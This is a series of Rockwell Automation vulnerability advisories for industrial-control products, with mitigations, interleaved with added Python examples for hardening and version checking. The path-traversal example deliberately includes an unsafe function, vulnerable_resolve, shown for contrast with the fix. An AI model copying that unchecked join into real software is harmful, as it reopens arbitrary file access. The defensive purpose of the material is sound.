FactoryTalk View Machine Edition | v12.0 | v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. Rockwell Automation would like to thank Yuval Gordon, CPS Research, and the Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-2071 IMPACT

FactoryTalk View Machine Edition on the PanelView Plus improperly verifies user input, which allows an unauthenticated attacker to achieve remote code execution via crafted malicious packets. The device has the functionality, through a CIP class, to execute exported functions from libraries. A routine restricts this to specific functions from two dynamic link library files. By using a CIP class, an attacker can upload a self-made library to the device, which allows the attacker to bypass the security check and execute any code written in the function.

CVSS Base Score: 9.8/10 (critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

  • Install the security patches for the respective versions referencing BF29493 - Patch: FactoryTalk Linx CIP Vulnerability issue, FactoryTalk View ME 12.0, 13.0.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • JSON CVE-2023-2071
  • CISA ICS-SA CSAF
High
PN1642 | Pavilion8® Security Misconfiguration Vulnerability
Published Date: October 05, 2023
Last Updated: October 05, 2023
CVE IDs: CVE-2023-29463
Products: Pavilion8®
CVSS Scores: 8.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – September 12, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
Pavilion8® | v5.17 | v5.20

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-29463 IMPACT

The JMX Console within Pavilion8® is exposed to application users and does not require authentication. If exploited, a malicious user could potentially retrieve other application users' session data and/or log users out of their sessions.

CVSS Base Score: 8.8/10
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: 287- Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Update to v5.20
  • QA43240 - Recommended Security Guidelines from Rockwell Automation


If customers are unable to update to v5.20, follow the instructions below to remove the vulnerable JMX console in v5.17.

  1. Open the web.xml file under Console\container\webapps\ROOT\WEB-INF in the Pavilion8® installation folder chosen during installation; by default this is C:\Pavilion\Console\container\webapps\ROOT\WEB-INF.
  2. Search for the text jmx-console-action-handler and delete the below lines from web.xml file:

      <servlet>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
      </servlet>
      <servlet-mapping>
        <servlet-name>jmx-console-action-handler</servlet-name>
        <url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
      </servlet-mapping>
     
  3. Save the changes and close the file.
  4. Restart Pavilion8® Console Service.
  5. Log out and log back into the console, then navigate to the URL http://<FQDN>/jmx-console and confirm you receive the error message HTTP Status 404 – Not Found.

Note: <FQDN> is your fully qualified domain name used for the Console login.
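The edit in steps 1 through 4 can be scripted. The Python below is an added example, not Rockwell code: it removes the `jmx-console-action-handler` servlet and its mapping from web.xml and leaves every other servlet in place. The sample web.xml is constructed for illustration, the default path is the one the advisory gives, and the service restart and the HTTP 404 check in step 5 remain manual.

```python
"""Remove the unauthenticated JMX console servlet from a Pavilion8 web.xml.

Added example, not Rockwell code: it automates steps 1-3 of the advisory's procedure
(the service restart and the HTTP 404 check in step 5 stay manual). It strips the
<servlet> named jmx-console-action-handler and its <servlet-mapping>, leaves every
other servlet intact, and works whether or not web.xml declares the Java EE namespace.
DEFAULT_WEB_XML is the path the advisory gives; SAMPLE_WEB_XML is a constructed file
for illustration, not Pavilion8's real deployment descriptor.
"""
import shutil
import xml.etree.ElementTree as ET
from pathlib import Path

DEFAULT_WEB_XML = Path(r"C:\Pavilion\Console\container\webapps\ROOT\WEB-INF\web.xml")
TARGET_SERVLET = "jmx-console-action-handler"

SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>console</servlet-name>
    <servlet-class>com.example.ConsoleServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>jmx-console-action-handler</servlet-name>
    <servlet-class>com.pav.jboss.jmx.HtmlAdaptorServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>console</servlet-name>
    <url-pattern>/console/*</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>jmx-console-action-handler</servlet-name>
    <url-pattern>/jmx-console/HtmlAdaptor</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local(tag: str) -> str:
    """Tag name without its {namespace} prefix."""
    return tag.rsplit("}", 1)[-1]


def remove_jmx_console(xml_text: str, servlet_name: str = TARGET_SERVLET) -> tuple:
    """Return (rewritten web.xml text, number of elements removed)."""
    root = ET.fromstring(xml_text)
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""
    if ns:
        ET.register_namespace("", ns)   # keep the default namespace unprefixed on output
    removed = 0
    for child in list(root):
        if _local(child.tag) not in ("servlet", "servlet-mapping"):
            continue
        name_el = next((e for e in child if _local(e.tag) == "servlet-name"), None)
        if name_el is not None and (name_el.text or "").strip() == servlet_name:
            root.remove(child)
            removed += 1
    body = ET.tostring(root, encoding="unicode")
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + body + "\n", removed


def servlet_names(xml_text: str) -> set:
    """Names still referenced by any <servlet> or <servlet-mapping>."""
    root = ET.fromstring(xml_text)
    return {(e.text or "").strip() for e in root.iter() if _local(e.tag) == "servlet-name"}


def harden_file(path: Path = DEFAULT_WEB_XML) -> int:
    """Back up web.xml, rewrite it in place, and return the number of elements removed.
    Restart the Pavilion8 Console Service afterwards (step 4) and verify with step 5."""
    shutil.copy2(path, path.with_suffix(".xml.bak"))
    new_text, removed = remove_jmx_console(path.read_text(encoding="utf-8"))
    path.write_text(new_text, encoding="utf-8")
    return removed
```

Keep the `.bak` copy until the 404 check in step 5 has passed; if the servlet name or mapping differs on your installation, `servlet_names()` on the original file shows what is actually registered.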

Additional Resources

  • CVE-2023-29463 JSON
High
PN1639 | Select Distributed I/O Communication Modules Vulnerable to a Denial-of-Service Vulnerability
Published Date: August 23, 2023
Last Updated: August 23, 2023
CVE IDs: CVE-2022-1737
Products: 1732E-OB16M12DR Series B, 1732E-IB16M12R Series B, 1734-AENTR, 1732E-OB16M12R Series B, 1732E-IB16M12DR Series B, 1732E-8X8M12DR Series B, 1738-AENTR Series A, 1732E-12X4M12P5QCDR Series A, 1732E-12X4M12QCDR Series A, 1732E-16CFGM12QCR Series A, 1734-AENT, 1732E-16CFGM12P5QCR Series A, 1732E-16CFGM12R Series B, 1799ER-IQ10XOQ10 Series B, 1732E-16CFGM12P5QCWR Series B, 1732E-16CFGM12QCWR Series A
CVSS Scores: 8.6
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – August 23, 2023

Affected Products

Affected Product | First Known in Firmware Version | Corrected in Firmware Version
1734-AENT/1734-AENTR Series C | <=7.011 | 7.013
1734-AENT/1734-AENTR Series B | <=5.019 | 5.021
1738-AENT/1738-AENTR Series B | <=6.011 | 6.013
1794-AENTR Series A | <=2.011 | 2.012
1732E-16CFGM12QCWR Series A | <=3.011 | 3.012
1732E-12X4M12QCDR Series A | <=3.011 | 3.012
1732E-16CFGM12QCR Series A | <=3.011 | 3.012
1732E-16CFGM12P5QCR Series A | <=3.011 | 3.012
1732E-12X4M12P5QCDR Series A | <=3.011 | 3.012
1732E-16CFGM12P5QCWR Series B | <=3.011 | 3.012
1732E-IB16M12R Series B | <=3.011 | 3.012
1732E-OB16M12R Series B | <=3.011 | 3.012
1732E-16CFGM12R Series B | <=3.011 | 3.012
1732E-IB16M12DR Series B | <=3.011 | 3.012
1732E-OB16M12DR Series B | <=3.011 | 3.012
1732E-8X8M12DR Series B | <=3.011 | 3.012
1799ER-IQ10XOQ10 Series B | <=3.011 | 3.012

Vulnerability Details

This issue was reported to Rockwell Automation by the Cybersecurity and Infrastructure Security Agency. The affected devices utilize the Pyramid Solutions EtherNet/IP Adapter kit and could potentially be affected by the vulnerability.

CVE-2022-1737 IMPACT
Pyramid Solutions' affected products, the Developer and DLL kits for EtherNet/IP Adapter and EtherNet/IP Scanner may be vulnerable to an out-of-bounds write, which may allow an unauthorized threat actor to send a specially crafted packet that may result in a denial-of-service condition.

CVSS Base Score: 8.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE: CWE-787 Out-of-Bounds Write


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage our customers to implement our suggested security best practices to minimize the risk of vulnerability.
  • Customers should upgrade to the corrected firmware to mitigate the issues.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2022-1737 JSON

Critical
PN1638 | ThinManager® ThinServer™ Input Validation Vulnerabilities
Published Date: August 17, 2023
Last Updated: August 17, 2023
CVE IDs: CVE-2023-2914, CVE-2023-2915, CVE-2023-2917
Products: ThinManager® ThinServer™
CVSS Scores: 7.5, 7.5, 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – August 17, 2023

Affected Products

Affected Product | Vulnerability | First Known in Software Versions | Corrected in Software Versions
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 11.0.0-11.0.6 | 11.0.7
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 11.1.0-11.1.6 | 11.1.7
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 11.2.0-11.2.6 | 11.2.8
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 12.0.0-12.0.5 | 12.0.6
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 12.1.0-12.1.6 | 12.1.7
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 13.0.0-13.0.2 | 13.0.3
ThinManager® ThinServer™ | CVE-2023-2914, CVE-2023-2915, CVE-2023-2917 | 13.1.0 | 13.1.1

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2023-2914 IMPACT
Due to improper input validation, an integer overflow condition exists in the affected products. When the ThinManager processes incoming messages, a read access violation occurs and terminates the process. A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation


CVE-2023-2915 IMPACT
Due to improper input validation, a path traversal vulnerability exists when the ThinManager processes a certain function. If exploited, an unauthenticated remote threat actor can delete arbitrary files with system privileges.   A malicious user could exploit this vulnerability by sending a specifically crafted synchronization protocol message.

CVSS Base Score: 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: 20 Improper Input Validation


CVE-2023-2917 IMPACT
Due to improper input validation, a path traversal vulnerability exists, via the file name field, when the ThinManager processes a certain function. If exploited, an unauthenticated remote attacker can upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed.  A malicious user could exploit this vulnerability by sending a crafted synchronization protocol message.

CVSS Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 Improper Input Validation
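Both path traversal issues above come down to using a client-supplied file name without confining it to the intended directory. The following Python is an added example (not Rockwell code, and not ThinManager's synchronization protocol) that shows the vulnerable join beside a hardened resolver; BASE_DIR is an assumed location, not ThinServer's real install path.

```python
"""Confining a message's file-name field to a base directory.

Added example, not Rockwell code and not ThinManager's synchronization protocol. It
shows the check CVE-2023-2915 and CVE-2023-2917 describe as missing: before a file name
taken from a client message is used to delete or write a file, resolve it and refuse
anything that leaves the base directory. The vulnerable resolver simply joins; the
hardened one rejects NUL bytes, absolute paths, Windows drive and UNC prefixes, and
".." components, then confirms the final path still sits under the base. BASE_DIR is an
assumed location, not ThinServer's real install path.
"""
import os
from pathlib import PurePosixPath, PureWindowsPath

BASE_DIR = "/opt/thinserver/data"   # assumed base directory for the model


class PathEscape(ValueError):
    pass


def vulnerable_resolve(base: str, name: str) -> str:
    """Joins the untrusted name onto base; '..' or an absolute name escapes."""
    return os.path.normpath(os.path.join(base, name))


def hardened_resolve(base: str, name: str) -> str:
    """Returns the resolved path only if it stays inside base; raises PathEscape otherwise."""
    if not name or "\x00" in name:
        raise PathEscape("empty name or NUL byte")
    win = PureWindowsPath(name)
    # Absolute under either convention, a drive letter (C:x is drive-relative and still
    # escapes on Windows), a UNC prefix, or a leading separator: all rejected.
    if PurePosixPath(name).is_absolute() or win.is_absolute() or win.drive \
            or name.startswith(("/", "\\")):
        raise PathEscape(f"absolute or drive-qualified name rejected: {name!r}")
    # Treat backslashes as separators so Windows-style traversal is caught on POSIX too.
    parts = [p for p in name.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise PathEscape(f"traversal rejected: {name!r}")
    base_abs = os.path.abspath(base)
    candidate = os.path.abspath(os.path.join(base_abs, *parts))
    # Final containment check, independent of the component filtering above.
    if os.path.commonpath([base_abs, candidate]) != base_abs:
        raise PathEscape(f"escapes base: {name!r}")
    return candidate
```

Note that `abspath` does not follow symbolic links; if the base directory may contain links pointing outside it, resolve with `os.path.realpath` on both sides before the containment comparison.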


Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.
  • Update to the corrected software versions.
  • Limit remote access for TCP Port 2031 to known thin clients and ThinManager servers.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2914 JSON
  • CVE-2023-2915 JSON
  • CVE-2023-2917 JSON

High
PN1637 | Armor™ PowerFlex® Critical Fault Vulnerability
Published Date: August 08, 2023
Last Updated: August 08, 2023
CVE IDs: CVE-2023-2423
Products: Armor™ PowerFlex®
CVSS Scores: 8.6
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – August 8, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Armor™ PowerFlex® | 1.003 | 2.001 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2423 IMPACT
A vulnerability was discovered in Armor™ PowerFlex® when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset. The error code would need to be cleared prior to resuming normal operations.

CVSS Base Score: 8.6
CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-682 Incorrect Calculation


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the below risk mitigations and implement our suggested security best practices to minimize risk of this vulnerability in their environments.
  • Update to the latest version of Armor™ PowerFlex® (2.001 or later).
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • JSON CVE-2023-2423

High
PN1634 | Kinetix® 5700 DC Bus Power Supply Series A – CIP Message Attack Could Cause Denial-Of-Service
Published Date: July 18, 2023
Last Updated: July 18, 2023
CVE IDs: CVE-2023-2263
Products: 2198 Kinetix 5700 Drive
CVSS Scores: 7.5
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – July 18, 2023

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
Kinetix® 5700 DC Bus Power Supply – Series A | V13.001 | V13.003

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-2263 IMPACT
The Kinetix® 5700 DC Bus Power Supply Series A is vulnerable to CIP fuzzing. If the device is impacted by this vulnerability, new ENIP connections cannot be established, which prohibits the operational capabilities of the device and results in a denial-of-service condition.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400: Uncontrolled Resource Consumption


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible.
  • Upgrade to V13.003 or later, which has been patched to mitigate this issue.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-2263 JSON

High
PN1635 | PN1635 | ThinManager® ThinServer™ Path Traversal Vulnerability
Published Date:
July 18, 2023
Last Updated:
July 18, 2023
CVE IDs:
CVE-2023-2913
Products:
ThinManager
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 18, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
ThinManager® ThinServer™ | 13.0.0 - 13.0.2 | 13.0.3 or later
ThinManager® ThinServer™ | 13.1.0 | 13.1.1 or later

Vulnerability Details

A vulnerability was discovered by Security Researchers at Flashpoint.io and reported to Rockwell Automation. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2913 IMPACT
An executable used in the affected products can be configured to enable an API feature in the HTTPS Server Settings. This feature is disabled by default. When the API is enabled and handling requests, a path traversal vulnerability exists that allows a remote actor to leverage the privileges of the server’s file system and read arbitrary files stored in it. A malicious user could exploit this vulnerability by submitting a request whose path contains manipulated path components.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-23: Relative Path Traversal


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of the vulnerability.
  • Update to the corrected software versions.
  • Disable the API feature and use a service account with appropriate access for the application.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2913 JSON
  • QA60051 - ThinManager : Download Patches and Updates

High
PN1633 | PN1633 | Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules
Published Date:
July 12, 2023
Last Updated:
July 12, 2023
CVE IDs:
CVE-2023-3596, CVE-2023-3595
Products:
Comms Modules
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – July 12, 2023

Executive Summary

Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advanced Persistent Threat (APT) actors affecting select communication modules. We are not aware of current exploitation leveraging this capability, and the intended victims remain unclear. Previous threat actor cyber activity involving industrial systems suggests a high likelihood that these capabilities were developed with an intent to target critical infrastructure and that the victim scope could include international customers. Threat activity is subject to change, and customers using affected products could face serious risk if exposed.

Rockwell Automation has provided patches for all affected products, including hardware series that were out of support. Detection rules have also been provided.

Exploitation of these vulnerabilities could allow malicious actors to gain remote access to the running memory of the module and perform malicious activity, such as manipulating the module’s firmware, inserting new functionality into the module, wiping the module’s memory, falsifying traffic to/from the module, establishing persistence on the module, and potentially affecting the underlying industrial process. This could result in destructive actions wherever vulnerable modules are installed, including in critical infrastructure.

Customers using the affected products are strongly encouraged to evaluate and implement the mitigations provided below. Additional details relating to the discovered vulnerabilities, including the products in scope, impact, and recommended countermeasures, are provided below.

Affected Products

Catalog | Series | Versions
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 & 5.028
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.003
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.003
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 & 5.028
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.003
1756-EN2F, 1756-EN2FK | A, B | <=5.008 & 5.028
1756-EN2F, 1756-EN2FK | C | <=11.003
1756-EN3TR, 1756-EN3TRK | A | <=5.008 & 5.028
1756-EN3TR, 1756-EN3TRK | B | <=11.003
1756-EN4TR, 1756-EN4TRK, 1756-EN4TRXT | A | <=5.001

Vulnerability Details

CVE-2023-3595
Where this vulnerability exists in the 1756 EN2* and 1756 EN3* products, it could allow a malicious user to perform remote code execution with persistence on the target system through maliciously crafted CIP messages. This includes the ability to modify, deny, and exfiltrate data passing through the device.

CVSS score: 9.8/10 (Critical)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787: Out-of-bounds Write


CVE-2023-3596
Where this vulnerability exists in the 1756-EN4* products, it could allow a malicious user to cause a denial of service by sending maliciously crafted CIP messages to the target system.

CVSS Score: 7.5/10 (High)
CVSS vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-787: Out-of-bounds Write

Risk Mitigation & User Action

These vulnerabilities can be addressed by performing a standard firmware update. Customers are strongly encouraged to implement the risk mitigations provided below and to the extent possible, to combine these with the QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.
Catalog | Series | Affected Versions | Remediations
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.003 | Update to 11.004 or later
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.003 | Update to 11.004 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.003 | Update to 11.004 or later
1756-EN2F, 1756-EN2FK | A, B | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN2F, 1756-EN2FK | C | <=11.003 | Update to 11.004 or later
1756-EN3TR, 1756-EN3TRK | A | <=5.008 & 5.028 | Update to 5.029 or later for signed versions (**recommended); update to 5.009 for unsigned versions
1756-EN3TR, 1756-EN3TRK | B | <=11.003 | Update to 11.004 or later
1756-EN4TR, 1756-EN4TRK, 1756-EN4TRXT | A | <=5.001 | Update to 5.002 or later
** Rockwell Automation strongly recommends updating to signed firmware if possible. Once the module is updated to signed firmware (for example, 5.008 to 5.029), it is not possible to revert to unsigned firmware versions.
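
The remediation table above is easy to misread when checked against an asset inventory, so the following added example (not Rockwell Automation's code) encodes it as rules and reports, for each recorded module, whether it is affected and which update applies. It reads "<=5.008 & 5.028" as "any revision up to and including 5.008, plus revision 5.028", an assumption about the table's notation, and the inventory rows are constructed sample data.

```python
"""Check 1756 ControlLogix communication modules against the PN1633 table.

Added example: the affected-version rules below are transcribed from the
advisory's remediation table; asset records are constructed sample data.
"""
from typing import Callable, List, NamedTuple, Optional, Tuple

Rev = Tuple[int, int]


def parse_rev(text: str) -> Rev:
    """Parse a firmware revision such as '5.008' or 'V11.003' into (major, minor)."""
    major, minor = text.strip().lstrip("vV").split(".")
    return int(major), int(minor)


# Affected-version predicates. "<=5.008 & 5.028" is read (assumption) as
# "any revision up to and including 5.008, plus revision 5.028".
def legacy_5x(rev: Rev) -> bool:
    return rev <= (5, 8) or rev == (5, 28)


def up_to_11_003(rev: Rev) -> bool:
    return rev <= (11, 3)


def up_to_5_001(rev: Rev) -> bool:
    return rev <= (5, 1)


def remediate_legacy(rev: Rev) -> str:
    # 5.028 is already signed firmware, so only the signed path applies;
    # unsigned modules may take either path, signed being recommended.
    if rev == (5, 28):
        return "Update to 5.029 or later (signed)"
    return "Update to 5.029 or later (signed, recommended) or 5.009 (unsigned)"


def remediate_11_004(rev: Rev) -> str:
    return "Update to 11.004 or later"


def remediate_5_002(rev: Rev) -> str:
    return "Update to 5.002 or later"


class Rule(NamedTuple):
    catalogs: Tuple[str, ...]
    series: Tuple[str, ...]
    affected: Callable[[Rev], bool]
    remediation: Callable[[Rev], str]


EN2T = ("1756-EN2T", "1756-EN2TK", "1756-EN2TXT")
EN2TP = ("1756-EN2TP", "1756-EN2TPK", "1756-EN2TPXT")
EN2TR = ("1756-EN2TR", "1756-EN2TRK", "1756-EN2TRXT")
EN2F = ("1756-EN2F", "1756-EN2FK")
EN3TR = ("1756-EN3TR", "1756-EN3TRK")
EN4TR = ("1756-EN4TR", "1756-EN4TRK", "1756-EN4TRXT")

RULES: List[Rule] = [
    Rule(EN2T, ("A", "B", "C"), legacy_5x, remediate_legacy),
    Rule(EN2T, ("D",), up_to_11_003, remediate_11_004),
    Rule(EN2TP, ("A",), up_to_11_003, remediate_11_004),
    Rule(EN2TR, ("A", "B"), legacy_5x, remediate_legacy),
    Rule(EN2TR, ("C",), up_to_11_003, remediate_11_004),
    Rule(EN2F, ("A", "B"), legacy_5x, remediate_legacy),
    Rule(EN2F, ("C",), up_to_11_003, remediate_11_004),
    Rule(EN3TR, ("A",), legacy_5x, remediate_legacy),
    Rule(EN3TR, ("B",), up_to_11_003, remediate_11_004),
    Rule(EN4TR, ("A",), up_to_5_001, remediate_5_002),
]


def assess(catalog: str, series: str, revision: str) -> Tuple[str, Optional[str]]:
    """Return (status, remediation); status is 'affected', 'not affected' or 'unknown'.

    'unknown' means the catalog/series pair is not in the advisory table, which
    is a prompt to check the advisory by hand, not a clean result."""
    rev = parse_rev(revision)
    cat, ser = catalog.strip().upper(), series.strip().upper()
    for rule in RULES:
        if cat in rule.catalogs and ser in rule.series:
            if rule.affected(rev):
                return "affected", rule.remediation(rev)
            return "not affected", None
    return "unknown", None


# Constructed asset records: (catalog, series, installed revision).
INVENTORY = [
    ("1756-EN2T", "C", "5.008"),
    ("1756-EN2T", "C", "5.028"),
    ("1756-EN2T", "D", "11.004"),
    ("1756-EN2TR", "C", "v11.003"),
    ("1756-EN4TR", "A", "5.001"),
    ("1756-EN2TP", "B", "11.003"),   # series not listed in the table
]


def scan(inventory) -> List[Tuple[str, str, str, str, Optional[str]]]:
    """Annotate each inventory row with its status and remediation."""
    return [(c, s, r, *assess(c, s, r)) for c, s, r in inventory]


if __name__ == "__main__":
    for row in scan(INVENTORY):
        print(row)
```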

Mitigations

Organizations should take the following actions to further secure ControlLogix communications modules from exploitation.
  • Update firmware. Update EN2* ControlLogix communications modules to firmware revision 11.004 and update EN4* ControlLogix communications modules to firmware revision 5.002.
  • Properly segment networks. Given a cyber actor would require network connectivity to the communication module to exploit the vulnerability, organizations should ensure ICS/SCADA networks are properly segmented within the process structure as well as from the Internet and other non-essential networks.
  • Implement detection signatures. Use appended Snort signatures to monitor and detect anomalous Common Industrial Protocol (CIP) packets to Rockwell Automation devices.
Additionally, organizations should increase protections of ICS/SCADA networks by implementing at least the following mitigations:
  • Regularly back up devices to allow for reversion to a clean copy of firmware or a working project;
  • disable unused CIP objects on communications modules, such as unused CIP Email and Socket Objects;
  • block all traffic to CIP-enabled devices from outside the ICS/SCADA network using available security products; and
  • monitor CIP traffic for unexpected content or unusual packet lengths.

Potential Indicators of Compromise

System owners should ensure ICS/SCADA networks are baselined and regularly monitored for deviations in network activity. Specifically, system owners can look for the following potential IOCs (Indicators of Compromise) for ControlLogix communications modules:
  • Unknown scanning on a network for Common Industrial Protocol (CIP)-enabled devices.
  • Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules, including the Email Object and non-public vendor-specified objects.
  • Arbitrary writes to communication module memory or firmware.
  • Unexpected firmware updates.
  • Unexpected disabling of secure boot options.
  • Uncommon firmware file names.

Detection Rules

